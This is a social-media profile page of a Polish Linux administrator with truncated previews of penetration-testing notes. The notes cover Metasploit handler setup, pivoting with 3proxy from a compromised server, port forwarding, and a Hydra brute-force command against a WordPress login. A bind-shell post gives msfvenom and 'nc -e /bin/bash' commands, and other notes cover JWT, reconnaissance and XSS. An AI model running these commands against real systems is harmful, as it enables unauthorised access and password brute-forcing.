Profile cover photo
Profile photo
Michał Błaszczak
89 followers -
Internauta / Administrator Linux / Projektant i administrator rozwiązań opartych o technologię VoIP.
Internauta / Administrator Linux / Projektant i administrator rozwiązań opartych o technologię VoIP.

89 followers
About
Posts

Post has attachment
Problem with Metasploit using an SSL Certificate (HandlerSSLCert)
If you want to use your own certificate for metasploit, for example in case windows/meterpreter/reverse_https we should use auxiliary/gather/impersonate_sslbut but earlier change setting openssl in your OS. in /etc/ssl/openssl.cnf from CipherString=DEFAULT@...
Add a comment...

Post has attachment
Pivoting
Jeśli potrzebujesz z serwera, na którym zdobyłeś powłokę dostać się do zasobów sieci lokalne to użyj 3proxy Serwer na którym zdobyłeś powłokę: wget https://github.com/z3APA3A/3proxy/archive/0.8.12.tar.gz tar zxvf 0.8.12.tar.gz cd 3proxy make -f Makefile.Lin...
Add a comment...

Post has attachment
Przekazywanie portu w Linux np. dla Metasploit
Podczas atakowania zewnętrznego celu często można spotkać następującą infrastrukturę: - Komputer A - ofiara - Komputer B - serwer pośredniczący - Komputer C - atakujący W celu przekazania połączenia z A do C należy zastosować przekierowanie portów za pomocą...
Add a comment...

Post has attachment
Hydra cheat sheet
Wordpress: hydra -l LOGIN -P /usr/share/wordlists/rockyou.txt www.website.com -S -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&redirect_to=https%3A%2F%2Fwww.website.com%2Fwp-admin%2F&wp-submit=Log In&testcookie=1:S=Location'
Add a comment...

Post has attachment
bind shell
msvenom bind shell: vitim: msfvenom p linux/x64/shell_bind_tcp  LPORT=2222  -f elf > shell.elf ./shell.elf attacker: nc IP_VICTIM 2222 netcat: nc -lvp 8080 -e /bin/bash < victim nc IP_VICTIM 8080 <-- attacker
Add a comment...

Post has attachment
Hardening firefox
[about:config] privacy.firstparty.isolate = true privacy.resistFingerprint = true privacy.trackingprotection.enabled = true privacy.donottrackheader.enabled = true privacy.donottrackheader.value = 1 browser.cache.disk.enable = false browser.cache.disk.files...
Add a comment...

Post has attachment

Post has attachment
JWT - JSON Web Tokens
Notatki z SHP JTW - bezpieczna wymiana informacji wykorzystująca json pomiędzy dwoma apkami   Rozkowanie base64 (wiec nie zapewnia poufności)   Httparchive   GoogleBigquery i wyszukiwanie danych z httparchive (np. Tokenow jwt, authorization basic itp) Brute...
Add a comment...

Post has attachment
Rekonesans IT
Notatki z SHP gotcha.pw - wyciek hasel (pobranie bazy bez gwiazdek? Tak) https://www.zoomeye.org/  /shodan : (zoomeye: +django +debug.) (W shodan has_screenshot:yes)   crt.sh   - %domena.pl (szuka subdomen) Builtswitch.com -pokazuje z jakich technologi zbud...
Add a comment...

Post has attachment
**
Notatki z SHP Prezentacja https://bentkowski.info/shp-gliwice Excessy - narzędzie do XSS , używające websockets od Michała Bentkowskiego XSS PROXY - https://github.com/securityMB/excessy   iframe=sanbox jako ochrona przed xss request get aby pobrać token cs...
Add a comment...
Wait while more posts are being loaded